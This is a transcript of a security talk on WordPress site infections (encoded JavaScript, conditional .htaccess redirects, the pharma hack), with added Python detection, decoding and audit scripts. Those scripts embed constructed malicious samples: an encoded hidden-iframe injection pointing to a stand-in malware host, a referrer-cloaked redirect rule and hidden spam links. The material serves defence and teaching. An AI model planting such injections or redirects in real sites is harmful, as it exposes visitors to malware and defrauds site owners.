why my website sells viagra
Post on 29-Jan-2015
DRE ARMEDA, CISSP
@DREMEDA
CO-FOUNDER AT SUCURI SECURITY
ORGANIZER, WORDCAMP SAN DIEGO
12 YEAR NAVY VETERAN
1ST WORDPRESS THEME IN 2005
LOVES TACOS
DIEHARD CHARGERS FAN
RIDES A HARLEY
SUCURI.NET
DRE.IM
THE WEB IS GROWING
Over 2 Billion internet users today. 480% growth in the last 11 years. (Internet World Stats)
300 million websites were added to the internet in 2011 (Pingdom)
100,000+ domains gained weekly (Global Domain Registry)
INNOVATION & CREATIVITY
IT'S NOT ALL PEACHY
WHAT IS MALWARE?
Malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.
SEO spam, JavaScript and iFrame injections, and malicious redirects are a few examples of web-based malware.
ATTACKERS LOVE YOU
Monitor your web browsing and internet usage
Forced advertising
Redirect affiliate marketing revenue
HOW BAD IS IT?
Over 2 million new malware strings monthly (McAfee)
Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)
Google Safe Browsing issues over 3 million malware warnings a day. (Google)
ENCODED JAVASCRIPT
JavaScript that is obfuscated (hidden) so that you can't tell what it does. It is injected into files/pages on the site and used to serve malware.
Impact: Website pages may be used to serve malicious downloads to visitors. Those downloads may infect visitors' desktop computers and/or steal the FTP credentials stored on them.
Typical Entry Point: Outdated, known-vulnerable software; exploited desktop computers; stolen FTP credentials.
ENCODED JAVASCRIPT
/wp-admin/js/cat.js – CLEAN
ENCODED JAVASCRIPT
/wp-admin/js/cat.js – INFECTED
ENCODED JAVASCRIPT
/wp-admin/js/cat.js – INFECTION DECODED – Somewhat
ENCODED JAVASCRIPT
How it works:
1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes). Alternatively, the attack starts from a compromised desktop on which malware steals the site's FTP credentials.
2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
3. The payload is inserted into various JavaScript files and/or encoded and hidden in theme and plugin files.
4. You've just enabled your visitors to load fake anti-virus and other "cool" downloads from your site.
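The kind of check a practitioner runs against step 3 above, as an added example that is not part of the talk: flag the indicators obfuscated injections rely on (eval, unescape, String.fromCharCode, long runs of %xx or \xNN escapes) and peel those encoding layers to reveal the hidden iframe. The clean script, the payload and the domain malware.example are constructed for the demo; the real cat.js on the slide is not reproduced here.

```python
import re
from urllib.parse import unquote

# Heuristic indicators of injected, obfuscated JavaScript. Any one of them can
# appear in legitimate code; several together in a file that should be static
# (an admin script, a theme's jQuery helper) deserve a look.
INDICATORS = {
    "eval": r"\beval\s*\(",
    "unescape": r"\bunescape\s*\(",
    "fromCharCode": r"String\.fromCharCode\s*\(",
    "document.write": r"document\.write\s*\(",
    "percent-escapes": r"(?:%[0-9a-fA-F]{2}){8,}",
    "hex-escapes": r"(?:\\x[0-9a-fA-F]{2}){8,}",
    "hidden-iframe": r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?[01]\b",
}


def indicators(js):
    """Names of the indicator patterns that match the given JavaScript text."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, js)]


def _peel(js):
    """Decode one layer of the three encodings seen most often in these injections."""
    # unescape("%64%6f...") -> the decoded literal
    js = re.sub(r"unescape\(\s*(['\"])([^'\"]*)\1\s*\)",
                lambda m: unquote(m.group(2)), js)
    # String.fromCharCode(100,111,...) -> the decoded literal
    js = re.sub(r"String\.fromCharCode\(\s*([0-9,\s]+)\)",
                lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
                js)
    # \xNN escapes -> the character
    js = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)
    return js


def decode_layers(js, max_rounds=8):
    """Peel encoding layers until nothing changes; nested layers need several rounds."""
    for _ in range(max_rounds):
        decoded = _peel(js)
        if decoded == js:
            break
        js = decoded
    return js


def extract_urls(text):
    """URLs the decoded payload points at (where the malware is actually served from)."""
    return re.findall(r"https?://[^\s'\"<>]+", text)


# Constructed stand-in for a legitimate admin script (not WordPress's real cat.js).
CLEAN_JS = """jQuery(document).ready(function($) {
    $('#category-add-toggle').click(function() {
        $('#category-adder').toggleClass('wp-hidden-children');
        $('#newcat').focus();
        return false;
    });
});
"""

# Constructed payload of the kind these injections carry: a 1x1 hidden iframe
# pulling content from a host the attacker controls (made-up domain).
PAYLOAD = ('document.write(\'<iframe src="http://malware.example/in.php" '
           'width=1 height=1 style="visibility:hidden"></iframe>\')')
PCT_PAYLOAD = "".join("%%%02x" % b for b in PAYLOAD.encode())
# Single layer appended to the clean file, as on the "INFECTED" slide.
INFECTED_JS = CLEAN_JS + 'eval(unescape("%s"));\n' % PCT_PAYLOAD
# Two layers: the unescape() call itself hidden behind String.fromCharCode.
NESTED_JS = "eval(String.fromCharCode(%s));" % ",".join(
    str(ord(c)) for c in 'eval(unescape("%s"))' % PCT_PAYLOAD)

if __name__ == "__main__":
    for label, js in (("clean", CLEAN_JS), ("infected", INFECTED_JS), ("nested", NESTED_JS)):
        print(label, indicators(js))
    decoded = decode_layers(INFECTED_JS)
    print(decoded.splitlines()[-1])
    print(extract_urls(decoded))
```

Run it over every .js file in a fresh checkout of your theme and plugins and diff the indicator lists against the same files from the vendor's package; an injected file gains eval/unescape/percent-escapes where the original had none. The decoder is deliberately partial, like the "Somewhat" slide: it handles the encodings above, not arbitrary packers, so treat an undecodable blob as suspicious rather than clean.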
ENCODED JAVASCRIPT
Encoded JavaScript Resources:
http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis
http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-javascript
http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-Obfuscation.html
QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
CONDITIONAL REDIRECTS
An attack that causes a website to redirect to a malicious website based on the visitor's referrer, web browser, or operating system.
Impact: When traffic is coming from a specific referrer (e.g. Google, Bing), the visitor is redirected to a malicious website; everyone else, including the site owner typing the address directly, sees the normal site.
Typical Entry Point: Outdated, known-vulnerable software.
CONDITIONAL REDIRECTS
Infected .htaccess file:
CONDITIONAL REDIRECTS
Result of conditional redirect:
CONDITIONAL REDIRECTS
How it works:
1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
3. .htaccess entries are created to perform the redirect. Encoded redirect code can also be added to index files.
4. You're now redirecting your visitors to some cool malware awesomeness.
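What step 3 looks like and why the owner never notices, as an added example that is not from the talk: a constructed .htaccess (not the one pictured on the slide) with a referrer-conditional redirect placed above WordPress's own rewrite block, a small parser that flags rules sending visitors off-site only when a referrer or User-Agent condition holds, and a simulator that approximates mod_rewrite closely enough to show a Google visitor and a direct visitor landing in different places. The domains are made up; the mod_rewrite semantics are a simplification (per-directory processing, [L] stops, no internal re-run).

```python
import re
from collections import namedtuple
from urllib.parse import urlparse

Cond = namedtuple("Cond", "var negate pattern flags")
Rule = namedtuple("Rule", "conds pattern target flags")

# Constructed sample: the injected block sits above WordPress's rules so it is
# evaluated first. Visitors arriving from a search engine are sent to an
# attacker-controlled host (made-up domain); everyone else sees the normal site.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule .* http://bad-pharmacy.example/go.php [R=301,L]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""


def _flags(token):
    return set(token.strip("[]").split(",")) if token else set()


def parse_htaccess(text):
    """Collect RewriteRule directives, each with the RewriteConds that precede it."""
    rules, pending = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        flags = _flags(parts[3]) if len(parts) > 3 else set()
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            pattern = parts[2]
            pending.append(Cond(parts[1].strip("%{}"), pattern.startswith("!"),
                                pattern.lstrip("!"), flags))
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            rules.append(Rule(tuple(pending), parts[1], parts[2], flags))
            pending = []
    return rules


def suspicious_rules(rules, site_host):
    """Rules that send the visitor off-site only when a referrer/User-Agent condition holds."""
    hits = []
    for rule in rules:
        target_host = urlparse(rule.target).hostname
        offsite = target_host is not None and target_host != site_host
        cloaked = any(c.var in ("HTTP_REFERER", "HTTP_USER_AGENT") for c in rule.conds)
        if offsite and cloaked:
            hits.append(rule)
    return hits


def _cond_holds(cond, env, existing):
    value = env.get(cond.var, "")
    if cond.pattern in ("-f", "-d"):  # file / directory existence tests
        hit = value in existing
    else:
        hit = re.search(cond.pattern, value, re.I if "NC" in cond.flags else 0) is not None
    return not hit if cond.negate else hit


def _conds_hold(conds, env, existing):
    # Apache ANDs consecutive conditions; [OR] joins a condition with the next one.
    outcome, pending_or = True, False
    for cond in conds:
        hit = _cond_holds(cond, env, existing)
        if "OR" in cond.flags:
            pending_or = pending_or or hit
        else:
            outcome = outcome and (pending_or or hit)
            pending_or = False
    return outcome


def simulate(rules, path, env, existing=frozenset()):
    """Substitution the first matching rule applies to `path` for a request whose
    server variables are in `env`, or None. Rules run in order; [L] stops."""
    for rule in rules:
        if not re.search(rule.pattern, path, re.I if "NC" in rule.flags else 0):
            continue
        if not _conds_hold(rule.conds, env, existing):
            continue
        if rule.target == "-":  # no substitution
            if "L" in rule.flags:
                return None
            continue
        return rule.target
    return None


if __name__ == "__main__":
    rules = parse_htaccess(SAMPLE_HTACCESS)
    for rule in suspicious_rules(rules, "www.example.org"):
        print("cloaked off-site redirect to", rule.target,
              "when", [c.var + " ~ " + c.pattern for c in rule.conds])
    print("from Google:", simulate(rules, "about/", {"HTTP_REFERER": "https://www.google.com/search?q=x"}))
    print("direct visit:", simulate(rules, "about/", {}))
```

The practical lesson is in the last two lines: the same page answers with the attacker's URL for a search visitor and with the normal WordPress front controller for the owner, which is why "I looked at my site and it's fine" proves nothing. Test your own site with a browser that sends a Google referrer, or with curl and an explicit Referer header, and read every .htaccess in the docroot and its parents, not just the one next to wp-config.php.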
CONDITIONAL REDIRECTS
Conditional Redirects Resources:
http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-domains.html
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html
PHARMA HACK
Pharma Hack is a type of SEO poisoning. Attackers manipulate search engine results so that their links appear higher than legitimate results.
Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages.
Typical Entry Point: Outdated, known-vulnerable software.
PHARMA HACK
Results of scanning rendered source:
PHARMA HACK
Google Search Engine Results:
PHARMA HACK
How it works:
1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
3. A control file is inserted into core application or plugin files. This file acts as the connection between the backdoor and the database.
4. The payload is dropped into the database, and Viva Viagra!
QUICK TIP: Check Google to see if you're infected - site:{yourdomain.com} viagra
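Because step 4 puts the payload in the database rather than in a file, a file-only scan misses it. The following is an added example, not code from the talk or from Sucuri: a scan of wp_options and wp_posts for pharma keywords, including values that were base64-encoded so they survive a casual look at the table, plus the same keyword check applied to rendered page source. The rows, the option name wp_check_hash and the domain pills.example are constructed stand-ins for a WordPress database.

```python
import base64
import re
import sqlite3

PHARMA_TERMS = ("viagra", "cialis", "levitra", "pharmacy")


def pharma_terms(text):
    """Pharma-spam keywords present in a blob of text (a rendered page or a DB value)."""
    lowered = text.lower()
    return [t for t in PHARMA_TERMS if t in lowered]


def _decoded_forms(value):
    """The value itself and, when it looks like base64, its decoded form."""
    yield value
    compact = "".join(value.split())
    if len(compact) >= 16 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        try:
            yield base64.b64decode(compact).decode("utf-8", "replace")
        except ValueError:  # not valid base64 after all
            return


def scan_database(conn):
    """Rows in wp_options / wp_posts carrying pharma keywords, plain or base64-encoded."""
    findings = []
    for name, value in conn.execute("SELECT option_name, option_value FROM wp_options"):
        for form in _decoded_forms(value):
            terms = pharma_terms(form)
            if terms:
                findings.append(("wp_options", name, terms))
                break
    for post_id, title, content in conn.execute(
            "SELECT ID, post_title, post_content FROM wp_posts"):
        terms = pharma_terms(title + " " + content)
        if terms:
            findings.append(("wp_posts", post_id, terms))
    return findings


# Constructed payload: the links are pushed off-screen so human visitors never
# see them while crawlers index them (made-up domain).
HIDDEN_DIV = ('<div style="position:absolute;left:-9999px">'
              '<a href="http://pills.example/">buy viagra online</a></div>')

# Constructed rows standing in for a WordPress database. The injected option
# uses an innocuous-looking name (made up here) and a base64 value.
OPTIONS = [
    ("siteurl", "http://www.example.org"),
    ("blogname", "Example Blog"),
    ("widget_text", 'a:1:{i:2;a:2:{s:5:"title";s:5:"About";s:4:"text";s:5:"Hello";}}'),
    ("wp_check_hash", base64.b64encode(HIDDEN_DIV.encode()).decode()),
]
POSTS = [
    (1, "Hello world!", "Welcome to WordPress. This is your first post."),
    (2, "Our services", 'We fix websites. <a href="http://pills.example/c">cheap cialis</a>'),
]


def build_sample_db():
    """In-memory SQLite copy of the two tables, for running the scan offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_name TEXT, option_value TEXT)")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_content TEXT)")
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", OPTIONS)
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", POSTS)
    return conn


if __name__ == "__main__":
    for location, key, terms in scan_database(build_sample_db()):
        print(location, key, terms)
    print(pharma_terms("<title>Cheap Levitra - Example Blog</title>"))
```

Against a real site, point the two SELECTs at the live database (the table prefix may not be wp_) and fetch the rendered source with a search-engine User-Agent as well as a normal one: the control file from step 3 often emits the spam only for crawlers, which is why the slide's "Results of scanning rendered source" can look clean in your own browser while Google shows pharmacy titles.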
PHARMA HACK
Pharma Hack Resources:
http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html
http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php
http://wpdude.com/refreshing-google-index-after-pharma-hack
WHAT IS SECURITY?
PROTECTING THINGS OF VALUE FROM HARM’S WAY.
HOW & WHY
AM I SECURE?
Risk can never be reduced to zero!
The name of the game is minimizing risk.
LOCAL MACHINE
Ensure your local machine stays updated
Use an Anti-Virus solution & enable auto-updates
Mac – Sophos Anti-Virus for Mac Home Edition
Windows – AVG Anti-Virus Free
Don’t store server credentials on your local machine
CONNECT TO YOUR SITE
Consider using SFTP or SSH instead of FTP, which sends your username and password in cleartext.
If you're stuck with FTP:
Deny anonymous login
Limit connections
Practice least privilege
PASSWORDS
Change them often
Don't write them down, or share them
Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others.
Don’t use the same password across all your accounts
Use a password manager
KeePass Password Safe
LastPass
1Password
WHO HOSTS YOU?
CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
DO YOUR RESEARCH!
What software are they running? How often do they update?
How are server and support credentials stored, and who has access? Are they one and the same?
What is their malware remediation process? How many of their sites have been infected?
http://www.google.com/safebrowsing/diagnostic?site=google.com
GARAGE CLEANING
IF YOU’RE NOT USING IT, REMOVE IT!
UPDATE UPDATE UPDATE UPDATE UPDATE
Only load what's needed to get your job done.
Check your file and directory permissions.
Remove unused user accounts! – Practice least privilege.
Have you changed your password lately?
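A concrete form of "check your file and directory permissions", as an added example that is not from the talk: an audit that flags world-writable entries, a wp-config.php readable by other local users, setuid/setgid bits, and PHP files sitting under wp-content/uploads (a favourite drop point for the backdoor in step 2 of each attack above). The checks work on (path, mode, is_dir) tuples so they can be tested offline; the sample tree below is constructed, including the file name wp-class.php.

```python
import os
import stat

UPLOADS_PREFIX = "wp-content/uploads/"
SCRIPT_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def classify(rel_path, mode, is_dir):
    """Problems with one entry; rel_path is relative to the web root, mode is st_mode."""
    perm = stat.S_IMODE(mode)
    problems = []
    if perm & stat.S_IWOTH:
        problems.append("world-writable")
    if rel_path == "wp-config.php" and perm & (stat.S_IRGRP | stat.S_IROTH):
        problems.append("wp-config.php readable by group or other users")
    if (not is_dir and rel_path.startswith(UPLOADS_PREFIX)
            and rel_path.lower().endswith(SCRIPT_SUFFIXES)):
        problems.append("script in uploads directory")
    if perm & (stat.S_ISUID | stat.S_ISGID):
        problems.append("setuid/setgid bit set")
    return problems


def audit_entries(entries):
    """(relative path, problem) pairs for every entry that fails a check."""
    return [(rel, p) for rel, mode, is_dir in entries for p in classify(rel, mode, is_dir)]


def walk_tree(root):
    """Gather (relative path, st_mode, is_dir) for everything under a real install."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entries.append((rel, st.st_mode, stat.S_ISDIR(st.st_mode)))
    return entries


# Constructed sample tree: modes are st_mode values (file type bits + permissions).
SAMPLE_ENTRIES = [
    ("wp-config.php", 0o100644, False),                          # 644: every local user can read the DB password
    ("wp-content", 0o040755, True),
    ("wp-content/uploads", 0o040777, True),                      # 777: anyone on the box can drop files here
    ("wp-content/uploads/2015/01/photo.jpg", 0o100644, False),
    ("wp-content/uploads/2015/01/wp-class.php", 0o100644, False),  # PHP where only media belongs
    ("wp-content/themes/twentytwelve/functions.php", 0o100666, False),  # 666: world-writable theme code
]

if __name__ == "__main__":
    import sys
    entries = walk_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ENTRIES
    for rel, problem in audit_entries(entries):
        print("%-45s %s" % (problem, rel))
```

Run it as `python audit.py /path/to/docroot` on the server itself (permissions seen over FTP are not always what the web server sees). Directories at 755 and files at 644, with wp-config.php tightened to 600 or 640, is the usual baseline; anything writable by "other" on a shared host is writable by every other customer's compromised account.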
BACKUP YOUR WEBSITE
NO BACKUPS = BOOOOO!
BackupBuddy - http://pluginbuddy.com/backupbuddy/
VaultPress – http://vaultpress.com
MALWARE SCAN
IS YOUR SITE INFECTED?
Unmask Parasites – http://unmaskparasites.com
Sucuri SiteCheck – http://sitecheck.sucuri.net
MALWARE CLEAN UP
IS YOUR SITE INFECTED?
VaultPress – http://vaultpress.com
Sucuri Security – http://sucuri.net
WORDPRESS PLUGINS
WordPress Exploit Scanner
BulletProof Security
Login Lockdown
Sucuri SiteCheck Malware Scanner